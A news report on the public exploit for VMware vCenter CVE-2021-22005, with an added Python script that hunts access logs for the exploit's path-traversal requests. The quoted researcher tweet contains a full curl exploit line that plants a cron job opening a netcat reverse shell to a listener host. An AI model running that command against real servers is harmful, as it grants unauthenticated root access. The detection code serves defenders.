A working exploit for the remote code execution (RCE) vulnerability in VMware vCenter Server tracked as CVE-2021-22005 has been publicly released. According to security experts, the bug is already being exploited by attackers.
A Different Exploit
The exploit, released this week by a security researcher at Rapid7, differs from the PoC exploit that began circulating last week. This version can be used to open a reverse shell on an exposed server, allowing a threat actor to execute arbitrary code.
According to experts, the RCE flaw allows an unauthenticated, remote attacker to upload files to the vCenter Server analytics service.
Complete Exploit in Reserve
The Rapid7 researcher said in a tweet that the PoC exploit for CVE-2021-22005 works against servers that have the Customer Experience Improvement Program (CEIP) component enabled.
CVE-2021-22005: Exploitation in the wild confirmed. Unredacted RCE PoC against CEIP below.
curl -kv “https://172.16.57.2/analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../etc/cron.d/$RANDOM” -H Content-Type: -d “* * * * * root nc -e /bin/sh 172.16.57.1 4444” https://t.co/wi08brjl3r pic.twitter.com/bwjMA21ifA
— wvu (@wvuuuuuuuuuuuuu) September 27, 2021
This vulnerability can be exploited by anyone who can reach vCenter Server over the network, regardless of the configuration settings of vCenter Server.
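For defenders, the request shape in the tweet above (a request to the analytics telemetry endpoint whose _i parameter walks up the directory tree) is something that can be hunted for in web access logs. The following is an added example, not code from the article, Rapid7 or VMware; it assumes combined-format access log lines (the sample lines below are constructed) and also checks URL-encoded and double-encoded variants of the traversal, which goes beyond the single command shown in the tweet.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Path of the vCenter analytics endpoint named in the report.
TELEMETRY_PATH = "/analytics/telemetry/ph/api/hyper/send"

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [27/Sep/2021:10:01:02 +0000] "POST /analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../etc/cron.d/12345 HTTP/1.1" 201 0
10.0.0.5 - - [27/Sep/2021:10:01:03 +0000] "POST /analytics/telemetry/ph/api/hyper/send?_c=&_i=%2F..%2F..%2Fetc%2Fcron.d%2Fx HTTP/1.1" 201 0
10.0.0.9 - - [27/Sep/2021:10:02:00 +0000] "POST /analytics/telemetry/ph/api/hyper/send?_c=vcsa&_i=daily-report HTTP/1.1" 200 0
10.0.0.9 - - [27/Sep/2021:10:03:00 +0000] "GET /ui/login HTTP/1.1" 200 1234
"""

# Pulls the method and request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')


def is_traversal(value: str) -> bool:
    """True if a decoded _i value contains a '..' path segment."""
    decoded = unquote(unquote(value))  # handle single and double percent-encoding
    return ".." in decoded.replace("\\", "/").split("/")


def find_suspicious(log_text: str) -> list:
    """Return (client_ip, _i value) for telemetry requests carrying traversal."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path != TELEMETRY_PATH:
            continue
        # parse_qs decodes one layer of percent-encoding; is_traversal handles more.
        for value in parse_qs(parts.query, keep_blank_values=True).get("_i", []):
            if is_traversal(value):
                hits.append((line.split()[0], value))
                break
    return hits


if __name__ == "__main__":
    for ip, target in find_suspicious(SAMPLE_LOG):
        print(f"suspicious telemetry upload from {ip}: _i={target}")
```

A legitimate CEIP upload should never need a parent-directory segment in _i, so any hit is worth reviewing against the server's patch level and its /etc/cron.d contents.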
As mentioned by BleepingComputer, the